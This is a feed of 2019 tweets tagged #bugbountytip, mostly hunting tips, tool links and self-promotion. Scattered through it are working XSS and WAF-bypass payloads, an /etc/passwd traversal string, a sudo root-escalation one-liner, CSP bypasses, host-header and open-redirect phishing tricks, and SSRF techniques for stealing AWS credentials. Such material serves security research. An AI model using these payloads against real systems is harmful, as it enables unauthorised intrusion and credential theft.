bugbountytip
@a_l_e_r_t_1_


2019-10-15 17:26:34
0 Less than 1$💪👉https://t.co/JPaA4CKmfO #BugBountyTip #xss #xxe #sqli #ssrf #ce
Vishnu Vardhan Gadupudi
@VishnuGadupudi


2019-10-15 16:04:43
1 The 7 main cases of XSS, thanks @brutelogic #bugbountytip #xss https://t.co/BBtdSvmYt6
ironfist
@ironfisto


2019-10-15 15:59:35
0 Not a great tip, but you might land a Cassandra cluster in the connection tab of DataStax Studio. Shodan search -> html:datastax #bugbountytip
Dhamu
@Dhamu_offensi


2019-10-15 12:56:16
7 #bugbountytip #bugbounty This is a collection of writeups, cheatsheets, videos, related to SSRF in one single location. https://t.co/ODpUpWRypc
Infected Drake
@0xInfection


2019-10-15 11:33:41
1 I wrote up a small script to return a single instance of a URL from a (huge) list of URLs irrespective of their parameter values. Useful in cases where you need to sort out URLs obtained from the wayback machine. Thanks to @har1sec for the assignment. :) #infosec #bugbountytip https://t.co/BnB2fqVdTd
Random Robbie
@Random_Robbie


2019-10-15 06:35:58
2 inside a container.... limited privs? SUDO!!!! https://t.co/ocd7FodNqp sudo -u#4294967295 id uid=0(root) gid=1002(robbie) groups=1002(robbie) sudo -u#4294967295 whoami root #bugbountytip #escapethcontainer
hyperdummy
@dummyclout


2019-10-15 05:15:54
0 ping for vis. any thoughts? #bugbounty #bugbountytip
Pat.
@PuzzledPat


2019-10-15 03:22:57
0 @MacRumors, check out the year 2038 in your iPhone calendar.. notice that #Apple have given July and April some extra months. #bugbountytip https://t.co/Wrk7TEexIS
mา‰4า‰xา‰Xา‰.า‰!า‰
@Deepak_maxx


2019-10-15 03:13:31
0 Morning Like this! #bugbounty #bugbountytip https://t.co/DsshG2nqAw
ً
@GouveaHeitor


2019-10-14 12:51:12
1 If you found a possible IDOR like: http://host/api/AccountID=123 but it is being blocked when you pass an ID from another account, try to bypass it with parameter pollution like: http://host/api/AccountId=123&AccountId=456 #bugbountytip
Ankush Goel
@0xankush


2019-10-14 06:53:27
0 If you are not automating and scripting, you are missing out on a lot of fun. It's all about time management in #bugbounty #bugbountytip
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2019-10-13 18:53:47
0 Get C|EH Certified with HackDoor Trainings Follow Us 💰💰💰💰 https://t.co/iNczOcGmCt YouTube Channel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #pentesting #cybersecurity #ceh #eccouncil #certification https://t.co/0gfcgW7uTM https://t.co/mzllE9lUqq
Ammar Amer🇸🇾
@cry__pto


2019-10-13 16:37:03
7 I have uploaded 74 new articles as PDF files about different fields of hacking + Linux, cybersecurity, etc. to my GitHub repository. Enjoy! #bugbountytips #pentest #redteam #OSINT #Malware #cybersecurity #hacking #infosec #linux #oscp #bugbountytip https://t.co/q2layzVpKz https://t.co/XE81lBik5M
Garth Humphreys
@garthhumphreys


2019-10-13 16:16:36
0 #Random thought: Is it #dups or #dupes ? #BugBounty #bugbountytip #infosec
Security Executions Code
@pwn0sec


2019-10-13 15:38:36
0 Bug Bounty ATT : Server-Side Request Forgery (SSRF) https://t.co/hjQLeWxwIS #bugbounty #bugbountytip #bugbountytips #ssrf #hackerone #att
ahamed morad
@Modam3r5


2019-10-13 15:06:47
2 this is one of my reports that I think let me win by the invitation. #bugbountytip https://t.co/fCcnzDat6I
Harsh kumar
@Harshku21974218


2019-10-13 12:37:58
1 Bypassing the WebARX Web Application Firewall (WAF) https://t.co/n09E8OhI2K #cybersecurity #bugbountytip
Evan Custodio
@defparam


2019-10-13 03:02:20
0 By using the boundary "SmuggleThis"+colon I could end the dangling part anywhere in the headers (could be handy). When I went to go check and see if "test.txt" was written to the server I was happy to see I had smuggled my own request and found the CDN headers. #bugbountytip https://t.co/BxYMvBYlsB
ghostlulz
@ghostlulz1337


2019-10-13 02:11:51
0 You know you can turn that SSRF finding into something with devastating impact right? The AWS metadata REST API can be used to steal credentials via SSRF. More information on my blog: https://t.co/2DgWQ2LJkp #infosec #bugbountytips #osint #redteam #aws #bugbountytip #ssrf #hack https://t.co/CCpKLNnF1m
Ashraf
@m0rph1n3e


2019-10-13 01:04:21
0 SPENDING HOURS TESTING MY TARGET FOR CLIENT SIDE VULNERABILITIES, I AM STUCK AT THIS POINT. ANY ADVICE? METHODOLOGY? #bugbounty #bugbountytip #bugbountytips #infosec #xss #ssti #rce #hackerone
Andri Wahyudi 📂
@andripwn


2019-10-12 22:03:00
1 admin live now #bugbounty #bugbountytip https://t.co/VEXedERrSN
Ammar Amer🇸🇾
@cry__pto


2019-10-12 19:33:37
1 Automatic screenshot tools, used to take screenshots of a large list of targets to extract useful info like errors that may lead to vulnerabilities -1-EyeWitness: https://t.co/7kbFXmViog -2-HTTPScreenShot: https://t.co/93SafaL5kg -3-Gowitness: https://t.co/YW8bdd75MW #bugbountytip
Rohit Kumar (@rohitcoder)
@rohitcoder


2019-10-12 09:30:44
0 https://t.co/KGbg9IYk2W Bounty: $$$ Thanks to Facebook and other programs, they're helping me to carry out my startup with these funds. This BugBounty life really helped me a lot. #BugBountyTip #BugBounty #Facebook #FacebookBugBounty #Hacker0x01 #EthicalHacking #Hacking
FS
@fsec__


2019-10-12 01:56:49
0 Terminal tips #bugbountytips #bugbountytip #bugbounty https://t.co/dMR3wWBW9c
hacks2learn
@hacks2learn


2019-10-12 00:48:14
0 #ProTip when dropping XSS payloads into a complex dynamic application use breadcrumbs to retrace your steps. I spent 60+ mins trying to find where my hidden pop-up came from... instead use tests like alert("Home->Settings->Profile->Background->Image->NAME_field") #bugbountytip
Garth Humphreys
@garthhumphreys


2019-10-11 20:59:04
0 Gained admin access! #BugBounty #bugbountytip #bugbounties #infosec #appsec #writeup https://t.co/tOKQkuzHax
kaustubh padwad
@s3curityb3ast


2019-10-11 20:46:37
0 One of the best parts of @SynackRedTeam is their missions. I rarely got the chance to grab one. But they are quick, they pay, and the knowledge is a bonus from it #bugbounty #bugbountytip #synack https://t.co/kBptrSMaam
Mourad
@SecuAudit


2019-10-11 16:04:53
0 Livechat is the most vulnerable part of a website, you have an 85% chance to find an XSS or IDOR there, if your favorite Bug Bounty program has livechat support, start pentesting it. #bugbountytip #bugbountytips #BugBounty https://t.co/LSwH3IZwY4
Somdev Sangwan
@s0md3v


2019-10-11 12:44:42
1 I performed a little experiment on bug hunters and as it turns out, lot of them are....curious hackers. Tweet 1's statistics are for 12 minutes and Tweet 2's statistics are for 5 minutes. Dear marketers, if you add #bugbountytip, these people will even read food recipes. https://t.co/s6vSo7Yra2
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2019-10-11 10:09:48
0 Maximise Your Bug Bounty Tutorial 🤩 Follow Us 💰💰💰💰 https://t.co/iNczOcGmCt Subscribe to YouTube Channel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops https://t.co/0gfcgW7uTM
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-10-11 10:06:48
0 Maximise Your Bug Bounty โ€”- ๐Ÿค‘๐Ÿค‘๐Ÿค‘ Bug Bounty Tools โ€” ๐Ÿคฉ๐Ÿคฉ Follow Us ๐Ÿ’ฐ๐Ÿ’ฐ๐Ÿ’ฐ๐Ÿ’ฐ https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity https://t.co/OgAsV7XrzP
mา‰4า‰xา‰Xา‰.า‰!า‰
@Deepak_maxx


2019-10-11 09:13:57
1 And sometimes for (LFI) url?para=//..//..//..//..//..//..//..//..//etc//passwd// Works!! #bugbountytip #BugBounty #bugbountytips #bugbounty
Sudoka
@sudo_sudoka


2019-10-11 04:35:44
0 Today I learned that @binaryedgeio can find many more things than Shodan. I searched for Pulse Secure VPN and found many servers that Shodan does not index. You should give it a try at https://t.co/AZ43zPOuOW #BugBounty #bugbountytip #infosec #ThreatIntel #recon https://t.co/R0yBjlP0Gz
Murdockz
@Murdockz_CEH


2019-10-11 03:20:28
0 5 hours = 2 Critical 1. Admin ATO 2. GraphQL API privilege escalation Take a step back and learn from your mistakes then come back harder. Writeups soon. #bugbounty #infosec #bugbountytip
Ashraf
@m0rph1n3e


2019-10-10 15:10:32
0 I'VE FOUND API, TOKENS, AND SECRET KEYS. HOW TO VALIDATE BEFORE WRITING A REPORT? I WISH SOMEONE ANSWER ME ASAP. #BugBounty #bugbountytip #bugbountytips #infosec #CyberSecurity #WAF #SSTi #RCE #XSS #DataLeakage
Vincent RATISKOL
@vratiskol


2019-10-10 14:26:18
0 To illustrate my previous post, Burp Session handling tracer showing session validation with macro before sending request @Burp_Suite #bugbountytip https://t.co/F90REmVw0J
Michele Romano
@Mik317_


2019-10-10 14:19:50
2 What endpoints do you control when you come across a WP/Ghost instance? I've found a really good one: /blog/_wpeprivate/config.json, what about you? #BugBounty #bugbountytip
Security Executions Code
@pwn0sec


2019-10-10 12:58:41
1 Android App Penetration Testing #1 https://t.co/mlqVodvKJp #bugbounty #android #app #vulnerability #bugbountytip
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2019-10-10 12:45:07
0 Maximise Your Bug Bounty With this Google Dork -- / -- inurl:fisheye AND inurl:changelog -site:https://t.co/G9MhGoP7IU -site:https://t.co/lc63NzPGi5 inurl:crucible AND inurl:changelog -site:https://t.co/G9MhGoP7IU -site:http://github #BugBounty #BugBountyTip #bugbountytips
bugbountytip
@a_l_e_r_t_1_


2019-10-10 11:54:38
0 Less than 1$💪👉https://t.co/JPaA4CKmfO #BugBountyTip #xss #xxe #sqli #ssrf #ce
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-10-10 08:07:07
1 Follow Us -- #CyberSecurity #Bugounty #BugBountyTip #ceh #eccouncil #certification #penetrationtesting #pentesting #pentester #hackerone https://t.co/Yytl4wdZn9
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2019-10-10 08:06:46
0 Follow Us -- #CyberSecurity #Bugounty #BugBountyTip #ceh #eccouncil #certification #penetrationtesting #pentesting #pentester #hackerone https://t.co/RQMWrnQNek
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2019-10-10 08:06:27
0 Follow Us -- #CyberSecurity #Bugounty #BugBountyTip #ceh #eccouncil #certification #penetrationtesting #pentesting #pentester #hackerone https://t.co/OY9jiDUdDR
mา‰4า‰xา‰Xา‰.า‰!า‰
@Deepak_maxx


2019-10-10 07:30:32
1 Simple Script for scanning ports of all grabbed subdomains using masscan for scan in $(cat <file-path>); do masscan -p1-65535 $(dig +short $scan|grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b"|head -1) --max-rate 1000 |& tee port_scan #BugBountyTips #bugbountytip #bugbounty
Iamsaintmalik_
@saintmalik_


2019-10-09 20:30:16
0 Guys am getting this response while trying to load some xss scripts, any help on how I can bypass this @bugbountyforum @stokfredrik @s0md3v #bugbountytips #BugBounty #bugbountytip https://t.co/n3jWvvTt7e
m0z
@LooseSecurity


2019-10-09 19:02:07
3 A quick reminder that my bug bounty challenge site is still live with 2 challenges! The second of which is very advanced (incorporating a WAF). https://t.co/cNYQsVPQ3K #bugbountytips #bugbountytip #bugbounties #bugbountyprogreartip
Rémy Marot
@R_Marot


2019-10-09 19:01:00
0 Simple but useful tool if you only have an index file inside a .git directory (no luck :)) and want to have it human readable : https://t.co/QRHd7CbsYC #bugbountytip
mา‰4า‰xา‰Xา‰.า‰!า‰
@Deepak_maxx


2019-10-09 18:58:38
0 One liner to import whole list of subdomains into Burp suite for automated scanning! cat <file-name> | parallel -j 200 curl -L -o /dev/null {} -x 127.0.0.1:8080 -k -s #bugbountytips #bugbounty #bugbountytip
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2019-10-09 17:35:17
0 Free Antivirus Be Like —// Follow Us -- https://t.co/S9CwjVYiHO… #CyberSecurity #Bugounty #BugBountyTip #ceh #eccouncil #certification #penetrationtesting #pentesting #pentester #hackerone https://t.co/XRSvgxtOyT
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-10-09 17:34:35
2 XSS Payload '"></title></script><img src=x onerror=confirm(1)> Follow Us -- https://t.co/S9CwjVYiHO… #CyberSecurity #Bugounty #BugBountyTip #ceh #eccouncil #certification #penetrationtesting #pentesting #pentester #hackerone
Mourad
@SecuAudit


2019-10-09 15:36:58
0 If you find a form where you need (Email + Date of birth + Zip code) to log in, try to remove Zip code and Date of birth and send the form. #bugbountytip #bugbountytips #BugBounty https://t.co/uVw71NPXLo
tololovejoi
@tolo7010


2019-10-09 13:43:58
0 Question: Can i know how old are you sir? Please answer me Answer: (Please see my replies below): #bugbounty #bugbountytips #bugbountytip
kassih mouhssine
@KassihMouhssine


2019-10-09 13:29:09
0 account takeover write up all what u need is the email of the victim #bugbountytips #bugbountytip #cybersecurite https://t.co/W1DzdvWjST
Sanketh Sharath
@sharathsanketh


2019-10-09 12:57:14
0 Thanks very much @PentesterLand for featuring my blog post/article in your newsletter this week! Was pleasantly surprised. Appreciate it :) This is a lot of motivation for a beginner like me. Cheers! #bugbounty #bugbountytips #bugbountytip
bugbountytip
@a_l_e_r_t_1_


2019-10-09 12:47:35
0 Less than 1$💪👉https://t.co/JPaA4CKmfO #BugBountyTip #xss #xxe #sqli #ssrf #ce
Mourad
@SecuAudit


2019-10-09 11:11:35
0 Pentesting is becoming Harder and Harder , When I started in 2013 things were different , Now you need to grow your Mindset more than your Skills to Survive and achieve a decent living standard from BugBounty . #bugbounty #bugbountytip #pentesting #hackerone https://t.co/envVq5Lu0Q
Ammar Amer🇸🇾
@cry__pto


2019-10-09 09:03:26
6 Sub-Domain Takeover Tools: -1-SubOver:https://t.co/uzQ2X1rQ2v -2-Subjack:https://t.co/FdytR89u1w -3-autoSubTakeover:https://t.co/TWHTicVKnI -4-tko-subs:https://t.co/Tawtj1NvWc -5-HostileSubBruteforcer:https://t.co/3ydVulWy8l -6-Aquatone:https://t.co/6oxb7sgOhJ #bugbountytip
Ammar Amer🇸🇾
@cry__pto


2019-10-09 07:53:40
2 2 udemy courses about ethical hacking free for a limited time both are 50 hours of useful content + high quality videos.and you will get a certification when finished prove that you finished the course. https://t.co/3xMEpNFL7u https://t.co/oZvixlG4LL #bugbountytip #hacking
mา‰4า‰xา‰Xา‰.า‰!า‰
@Deepak_maxx


2019-10-09 07:07:53
0 Just saw your video on automation for finding 3rd level domains @thecybermentor It was nice!, Can use subfinder instead with -recursive option will do the same right? subfinder -d <domain> -recursive -silent -t 200 -v -o <out-put-file> #bugbounty #bugbountytip
Hritik Sharma
@iamHritikSH


2019-10-09 05:56:22
0 Server parses the XML but the problem is parameter entities are not working and whenever I try to use normal entity the server responds that content is not valid for application/xml, any tips community? #bugbounty #bugbountytips #bugbountytip
Brodie Codie
@brodie_codie


2019-10-09 03:04:35
3 Mood After finding another Bug #hackers #netsec #bugbounty #hacking #redteam #OSINT #recon #offsec #CTF #pentest #bugbountytip #bugbountytips #BrodieCodie #Metasploit #infosec #infosecurity https://t.co/bqwQBo5GVj
m0z
@LooseSecurity


2019-10-08 20:49:41
3 When I started out on my #BugBounty journey a little over 2 years ago, I read all the vulnerabilities on this page (and attempted to make a vuln web app to test some of them): https://t.co/M8VmqRlt8I I hope it helps someone else start their journey. #bugbountytip #bugbountytips
baluz🔥
@haknfuk


2019-10-08 14:42:47
0 If u feel like quitting stop feeling it #bugbountytip
Vishnu Vardhan Gadupudi
@VishnuGadupudi


2019-10-08 12:48:22
0 #bugbountytip if you ever encounter a endpoint filtering ' try \' it may work sometimes :) #sqli
Khaled Mohamed
@xelkomy


2019-10-08 12:42:46
0 awesome machine #hackthebox @hackthebox_eu #bugbountytip https://t.co/RtbEq1u5Z9
Vishnu Vardhan Gadupudi
@VishnuGadupudi


2019-10-08 12:15:05
0 Hackers Turn Own Features Against It 🔥💕 #bugbountytip
bugbountytip
@a_l_e_r_t_1_


2019-10-08 10:23:58
0 Less than 1$💪👉https://t.co/JPaA4CKmfO #BugBountyTip #xss #xxe #sqli #ssrf #ce
Vishnu Vardhan Gadupudi
@VishnuGadupudi


2019-10-07 16:46:27
0 Seriously don't waste your time on searching for crlf injections, today i scanned nearly 30000+ unique domains and guess how many crlf's i found 0. #bugbountytip
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2019-10-07 07:17:36
1 XSS Payload '"></title></script><img src=x onerror=confirm(1)> Follow Us -- https://t.co/iNczOcGmCt #CyberSecurity #Bugounty #BugBountyTip #ceh #eccouncil #certification #penetrationtesting #pentesting #pentester #hackerone
bugbountytip
@a_l_e_r_t_1_


2019-10-07 06:06:27
0 Less than 1$💪👉https://t.co/JPaA4CKmfO #BugBountyTip #xss #xxe #sqli #ssrf #ce
Sudoka
@sudo_sudoka


2019-10-07 04:50:48
0 Koha, the popular open source ILS, has Open Redirect at https://t.co/4FJZI7rSG7. Google Dork for inurl:/cgi-bin/koha/ Then send a request to victims like this: site[.]com/cgi-bin/koha/tracklinks.pl?uri=//phishing.site #bugbounty #bugbountytip #threatintel
Securisec 🚀
@securisec


2019-10-07 00:40:26
2 "RT RT LooseSecurity: Here's a #XSS write-up describing a specific WAF bypassing method I used to score a bounty a few months ago! https://t.co/bVfEZ0Drd4 #bugbountytips #BugBounty #bugbountytip"
Abood Nour
@AboodNour


2019-10-06 23:35:12
1 Found a better way to search GitHub projects using their own search filters. https://t.co/JJ7sn2DjQj In my case: `filename:file.php libname in:path` increased returned unique results to > 1.2K instead of ~20 returned from similar Google dork #BugBountyTip #BugBounty
m0z
@LooseSecurity


2019-10-06 22:32:42
5 Here's a #XSS write-up describing a specific WAF bypassing method I used to score a bounty a few months ago! https://t.co/NHrtVoOw04 #bugbountytips #BugBounty #bugbountytip
Katie Paxton-Fear
@InsiderPhD


2019-10-06 22:17:04
3 Coming this week: the first video in the 'Finding Your First Bug' series, we're going to look at Business Logic Errors, first we'll look at what they are, how to find them, examples of some real bugs and do a practical with Burp! #BugBounty #bugbountytips #bugbountytip https://t.co/KxOUGVSxR3
RHack
@Queseguridad


2019-10-06 19:38:39
0 Some payloads bypass XSS '"><iframe srcdoc='%26lt;script>;prompt`${document.domain}`%26lt;/script>'> CloudFront 1%3C/script%3E%3Csvg/onload=prompt(document[`domain`])%3E Akamai <dETAILS/open/onToGgle=a=prompt,a(45) x> Inperva #Bugbounty #Bugbountytip #infosec
Eduard Tolosa
@Edu4rdSHL


2019-10-06 19:11:55
3 Findomain 0.5.0 is out! Now you can also send new subdomain alerts to @telegram! Check out the documentation for a detailed guide on how get it working! https://t.co/VKrEP3eY4d #subdomains #enumeration #monitoring #BugBounty #bugbountytip #reconnaissance #automation #webhooks
Joe Bradshaw
@SnakesNBradders


2019-10-06 17:01:47
0 Want to extend this to the bugbounty community as well for help. #bugbountytip https://t.co/eqYt3M5gFX
Ammar Amer🇸🇾
@cry__pto


2019-10-06 08:01:17
3 During web pentesting operations, when seeing a registration page you should try to register with an existing username, to see if you can enumerate users. This is what I saw on @PayPal; you can automate the whole process and get a list of website users. #bugbountytip #hacking https://t.co/WOZYUy4ulH
baluz🔥
@haknfuk


2019-10-06 06:15:57
1 #bugbounty #bugbountytip a channel for coders https://t.co/9JRrkSX6Pe
John mash
@Techhelplistcom


2019-10-06 05:00:01
0 I have uploaded 38 new articles as PDF files about different fields of hacking to my GitHub repository. Enjoy! #bugbountytip #pentest #redteam #osint #Malware #cybersecurity #hacking #infosec https://t.co/fNomAuiIdC https://t.co/waACGyXyHC
Matt Palmer
@mattpalmer_au


2019-10-06 04:44:27
0 1. First Program: Indeed 2. Had difficulties: Google 3. Most used Platform: Bugcrowd and Google 4. Totally hate: 5. Most loved: Automation 6. For beginners: Read, read, read #bugbounty #bugbountytip #bugbountytips https://t.co/EevoSwrDA5
Ammar Amer🇸🇾
@cry__pto


2019-10-06 04:28:06
4 I have uploaded 38 new articles as PDF files about different fields of hacking to my GitHub repository. Enjoy! #bugbountytip #pentest #redteam #osint #Malware #cybersecurity #hacking #infosec https://t.co/q2layzVpKz https://t.co/52Utrc6IMy
Imran nissar
@Imrannissar3


2019-10-05 22:25:11
0 Unexpected behaviour regarding web cache deception attack. Using Account 1 the page is being cached for 1 min and I am able to see all the information in incognito/different browser, but when I log in from a different account the page is not being cached #bugbountytip #hackerone
bugbountytip
@a_l_e_r_t_1_


2019-10-05 19:29:36
0 Less than 1$💪👉https://t.co/JPaA4CKmfO #BugBountyTip #xss #xxe #sqli #ssrf #ce
jub0bs
@jub0bs


2019-10-05 17:15:48
0 #BugBountyTip "[Blind SSRF] cannot be trivially exploited to retrieve sensitive data from back-end systems"... except when forged requests to an attacker-controlled server contain sensitive data (e.g. an API key in headers). Happened to me a few days ago. https://t.co/LTrqNqZ8zK
Nick (@hunt4p1zza)
@ngkogkos


2019-10-05 13:41:01
2 Custom wordlist for file/folder/param fuzzing: 1. Flag interesting requests w/ "WLIST" in Burp constantly 2. Sort requests w/ "WLIST" > HTTP History 3. Use CO2 plugin, send requests to CeWLer & Extract Words 4. Normalize wordlist to ASCII w/ IDE/bash #bugbounty #bugbountytip https://t.co/lazF02od9j
bugbountytip
@a_l_e_r_t_1_


2019-10-05 12:39:03
0 Less than 1$💪👉https://t.co/JPaA4CKmfO #BugBountyTip #xss #xxe #sqli #ssrf #ce
Jinone
@jinonehk


2019-10-05 09:57:12
0 <script src="https://t.co/1UvE8Y0fOd)"></script> bypass csp https://t.co/Jt9xQeag4g #BugBounty #BugBountyTip #WAF https://t.co/nz2OYbKBGx
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2019-10-04 21:14:53
0 Silent omission of certificate hostname verification in LibreSSL and BoringSSL Follow Us -- https://t.co/iNczOcGmCt #CyberSecurity #Bugounty #BugBountyTip #ceh #eccouncil #certification #penetrationtesting #pentesting #pentester #hackerone https://t.co/A2EJ8bgNyP
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2019-10-04 21:13:13
0 Malware Analysis 101 - Sandboxing Follow Us -- https://t.co/iNczOcGmCt #CyberSecurity #Bugounty #BugBountyTip #ceh #eccouncil #certification #penetrationtesting #pentesting #pentester #hacker https://t.co/TXX3kDeuhe
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2019-10-04 21:09:35
0 Pushing Left, Like a Boss: Table of Contents Follow Us -- https://t.co/iNczOcGmCt #CyberSecurity #Bugounty #BugBountyTip #ceh #eccouncil #certification #penetrationtesting #pentesting #pentester #hacker https://t.co/Xs9P4t11CR
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2019-10-04 21:08:16
0 Red Teamer’s Guide to Pulse Secure SSL VPN Follow Us -- https://t.co/iNczOcGmCt #CyberSecurity #Bugounty #BugBountyTip #ceh #eccouncil #certification #penetrationtesting #pentesting #pentester #hacker https://t.co/7qf0K4KUKR
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-10-04 21:04:53
2 Download predictions details of ads plans of any business. Follow Us -- https://t.co/iNczOcGmCt #CyberSecurity #Bugounty #BugBountyTip #ceh #eccouncil #certification #penetrationtesting #pentesting #pentester #hacker https://t.co/nj3z2KLprL
Nick (@hunt4p1zza)
@ngkogkos


2019-10-04 19:20:20
0 This is the bash function I use for #bugbounty on a target. Although I use checklists, enforcing organization via the filesystem forces me to do a good/clean job & serves as a 2nd checklist. Also, helps w/ being more efficient, as you can tailor cheatsheets/scripts. #bugbountytip https://t.co/B7gq2pvaZW
bugbountytip
@a_l_e_r_t_1_


2019-10-04 15:50:17
0 Chrome ❎ Firefox ✅ #Bugbountytip https://t.co/nB1NqVdEPK
Ammar Amer🇸🇾
@cry__pto


2019-10-04 13:37:36
2 The Multi-Tool Web Vulnerability Scanner. sometimes you may need to automate some work+ it may give you some ideas wget -O https://t.co/AVYJOtJVY1 https://t.co/eBwaz4GrYH && chmod +x https://t.co/AVYJOtJVY1 python https://t.co/AVYJOtJVY1 https://t.co/KdHhpMDaA0 #bugbountytip https://t.co/wMBgzbyvVx
Michele Romano
@Mik317_


2019-10-04 13:32:34
1 Bypassed a CSTI protection: {{alert(1)}} renders a <span> tag with value 1 ... JS not evaluated, but you can turn it in {{alert('<script>alert(1)</script>')}} and your day becomes a better day 😊 #bugbountytip
Shiva Kumawat
@ShivaKumawat88


2019-10-04 12:59:48
0 It may be a bug at #amazon mobile app #AmazonRocketDeals #AmazonGreatIndianFestival #AmazonRiddler #JokerMovie #bugbountytip #techno Here is video link--- https://t.co/I16F6WSj85
Evan Custodio
@defparam


2019-10-04 12:18:43
0 If an app accepts XLSX to convert to PDF/HTML it may run the file through MS Excel to eval formulas/convert. Try testing =WEBSERVICE(https://t.co/VXyqysIsep) and see if XML/HTML is added to the form (insta-SSRF). No clue excel even had this function #bugbountytip #bugbountytips
Flawwan
@Flawwan


2019-10-04 10:29:30
0 New blog post: Abusing PHP strip tags to bypass modern WAF to exploit XSS. https://t.co/MXRTMOuoEV #BugBounty #bugbountytip
bugbountytip
@a_l_e_r_t_1_


2019-10-04 09:41:07
0 Less than 1$💪👉https://t.co/JPaA4CKmfO #BugBountyTip #xss #xxe #sqli #ssrf #ce
Khaled Mohamed
@xelkomy


2019-10-04 08:30:35
0 #xss #bugbountytip #xelkomy Reflected Xss in Ibm POC https://t.co/YOoDCKbYHe
Imran nissar
@Imrannissar3


2019-10-04 07:58:45
0 Password reset host header injection Host: https://t.co/cxR3o4EYIs Bypassed by Host:https://t.co/cxR3o4EYIs"><a href='https://t.co/wgqXnDuzXt> #bugbountytip #bugbounty @Hacker0x01 @Bugcrowd
Verneet
@err0rrrrr


2019-10-04 06:41:10
1 Bypass CSP with: <embed /: script allowscriptaccess = always src = javascript:alert(document.cookie); https://t.co/dIZsSFrPmX> Just bypassed a Taxi company CSP :p @LooseSecurity #bugbountytip #bugbounty #bugcrowd
Evan Custodio
@defparam


2019-10-04 00:06:57
0 @AldoTheCrott @NahamSec @Twitch HTML injection in a email callback where I could control the CC addr and parts of the body. #bugbountytip test adding HTML into email callbacks. If the email puts the email address in the body try adding HTML after a '+'-sign alias (e.g. foo+<B><BR>[email protected])
A hacker's life
@Unknownuser1806


2019-10-03 20:49:05
0 Open redirect payloads https://t.co/ObQYpkmvym #payload,#hacking, #bugbounty,#bugbountytip
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2019-10-03 20:08:23
0 Bug Bounty = Hardwork + Will Power + Dedication #bugbounty #bugbountytip #devsecops #devops #secops #cybersecurity #hacking https://t.co/o9uZTW5vDa
Fisher
@Regala_


2019-10-03 18:31:03
0 @rudra16t @zseano Are you learning? Are you improving? Are you a better hacker than what you were a year ago? You get imposter syndrome if you compare yourself to others. YOU are only one you should compare and compete with. #bugbountytip
გოჩა ოქრაძე (Gocha Okradze)
@GochaOqradze


2019-10-03 15:39:29
0 #bugbountytips #bugbountytip Need help. Get good xss from cookie based xss. Any suggestion? Share your knowledge.
Masonhck357
@DanielM59720745


2019-10-03 14:56:24
0 #bugbountytip NEVER STOP DOING RECON: I ended up finding sensitive info on a subdomain that I found doing recon the second time around last week. I just found out that the subdomain is only used when they sell tickets for an event. They said that my timing was just perfect :)
intigriti
@intigriti


2019-10-03 14:18:30
9 Can't get CSRF with POST? Then GET it! Use 'change request method' in Burp Suite to check if the server also accepts GET requests. Thanks for the #BugBountyTip, @spaceraccoonsec! #HackWithIntigriti https://t.co/YVRPwZD6L0
bugbountytip
@a_l_e_r_t_1_


2019-10-03 08:05:53
1 Less than 1$💪👉https://t.co/JPaA4CKmfO #BugBountyTip #xss #xxe #sqli #ssrf #ce
bing0o
@hack1lab


2019-10-03 02:46:08
1 My new tool now on github, Web Technologies Detector, simple but useful for developers, penetration testers and bug hunters 😎 https://t.co/z5FF4P3v9j #bugbountytool #BugBountyTip #bing0o https://t.co/ewDkgbl1L4
bugbountytip
@a_l_e_r_t_1_


2019-10-02 21:04:44
0 Less than 1$💪👉https://t.co/JPaA4CKmfO #BugBountyTip #xss #xxe #sqli #ssrf #ce
✎ /𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-10-02 17:14:40
9 CloudFront ~`XSS´ payload, shake dice. 🎲 <iframe srcdoc=<svg/o&#x6Eload=alert(1)>> #BugBounty #BugBountyTip #WAF #infosec
dedsec
@dedsec211


2019-10-02 16:05:42
